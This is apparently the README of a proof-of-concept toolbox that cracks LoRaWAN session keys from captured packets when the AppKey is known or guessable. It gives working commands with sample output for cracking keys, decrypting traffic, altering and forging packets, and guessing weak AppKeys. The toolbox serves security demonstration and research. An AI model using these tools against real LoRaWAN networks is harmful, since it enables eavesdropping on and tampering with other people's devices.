Created by Sipke Mellema of Applied Risk
This is a Proof-of-Concept for demonstrating the dangers of using the same AppKey on multiple LoRaWAN nodes.
This repository holds a toolbox for cracking LoRaWAN session keys from captured packets. The attack scenario assumes you know the AppKey but missed the handshake. Or the AppKey isn't random and can be guessed.
LoRa handshakes use three values to generate the session keys:
AppNonce | NetID | DevNonce
AppNonce and NetID are 3 bytes, and DevNonce is 2 bytes. Part of the NetID is known, so that leaves 57-bit entropy. And because of implementation flaws this can get way lower.
Just make it. Note that you may have to link to an openssl 1.0.* location in the Makefile.
./loracrack -k <AppKey in hex> -p <raw_packet in hex>
Cracks session keys if handshake (join-accept) is missed but AppKey is known. Cracking is done by generating session keys and checking the MIC.
$ ./loracrack -k 88888888888888888888888888888888 -p 400267bd018005000142d9f48c52ea717c57
4899be88e40088c40abc703fa3ba1195 04068f88b9feee5385c67e033d911b4a
Optional arguments:
-t threads
-v verbose (0, 1 or 2)
-m maximum AppNonce
./loracrack_knownpt -k <AppKey in hex> -p <raw_packet in hex> -d <plain_text in hex>
Cracks session keys if handshake (join-accept) is missed but AppKey and plaintext are known. Cracking is done by decrypting the FRMPayload and checking the plaintext. It's faster than checking the MIC, since the CMAC uses more AES operations.
$ ./loracrack_knownpt -k 88888888888888888888888888888888 -p 400267bd018005000142d9f48c52ea717c57 -d 33302e3332
4899be88e40088c40abc703fa3ba1195 04068f88b9feee5385c67e033d911b4a
Optional arguments:
-t threads
-v verbose (0, 1 or 2)
-m maximum AppNonce
./loracrack_decrypt -k <decrypt key in hex> -p <raw_packet in hex>
Decrypts packet data if session key is known.
$ ./loracrack_decrypt -k 4899be88e40088c40abc703fa3ba1195 -p 400267bd018005000142d9f48c52ea717c57
30.32
./loracrack_alterpacket -p <raw_packet in hex> -a <AppSKey in hex> -n <NwkSKey in hex> -c <Fctn> -d <new data in hex>
Alters packet with new data, keeps old things like DeviceAddr.
$ ./loracrack_alterpacket -p 400267bd018005000142d9f48c52ea717c57 -a 4899be88e40088c40abc703fa3ba1195 -n 04068f88b9feee5385c67e033d911b4a -c 5 -d 33302d3332
400267bd018005000142d9f78c521c78573b
./loracrack_genkeys -k <AppKey in hex> -j <join_packet in hex> -a <accept_packet in hex>
Generates session keys given handshake (join and accept packets) and AppKey.
$ ./loracrack_genkeys -k 88888888888888888888888888888888 -j 0000000000000000002bd61f000ba304000e1ba147157a -a 20adf6e18980952590fc1f7987a6913f35
4e1dcaf4f02fcd2ecbb1cb0d138fc53d 96eb9e13f0a3468ca580707ee688ee19
./loracrack_guessjoin -p <raw_packet in hex> -f <file with AppKeys in hex>
Checks if predictable AppKeys are used by checking the MIC on a join packet. AppKeys are taken from a file with hex-encoded AppKeys on new lines.
$ ./loracrack_guessjoin -p 0000000000000000002bd61f000ba304002f3b5785cf80 -f guessjoin_genkeys/simplekeys
88888888888888888888888888888888